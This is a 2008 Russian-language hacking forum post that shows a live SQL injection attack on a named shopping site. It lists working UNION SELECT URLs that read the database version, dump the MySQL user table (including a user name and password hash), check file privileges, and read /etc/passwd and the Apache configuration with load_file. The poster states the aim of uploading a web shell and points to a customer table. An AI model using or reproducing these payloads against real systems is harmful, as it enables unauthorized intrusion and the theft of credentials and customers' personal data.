17.03.2008, 12:10
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802
Репутация:
52
|
|
www.getethical.com
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,version(),3,4,5/*
Доступ к mysql.user
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,concat_ws(0x3a,user,password,host),3,4,5+from+mysql.user/*
- Рут без пароля, однако подключение только с локалхоста. Хотя существует юзер: leith:663ebe8f58ee1b6c:% - откуда угодно - но учитывая желание залить шелл - не интересно 
file_priv=Y
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,file_priv,3,4,5+from+mysql.user+where+user=left(user(),locate(0x40,user())-1)/*
/etc/passwd
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/passwd'),3,4,5/*
И кавычки не экранируются=) кажется можно попробовать залить шелл.
httpd.conf
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5+from+mysql.user/*
Однако папочки /var/www/getethical/public_html/ не нашлось(((( Может кто-то подкажет где можно посмотреть полный путь к сайту?
Ну и напоследок - есть интересная таблица customers
Последний раз редактировалось Dima-k17; 17.03.2008 в 12:13..
|
|
|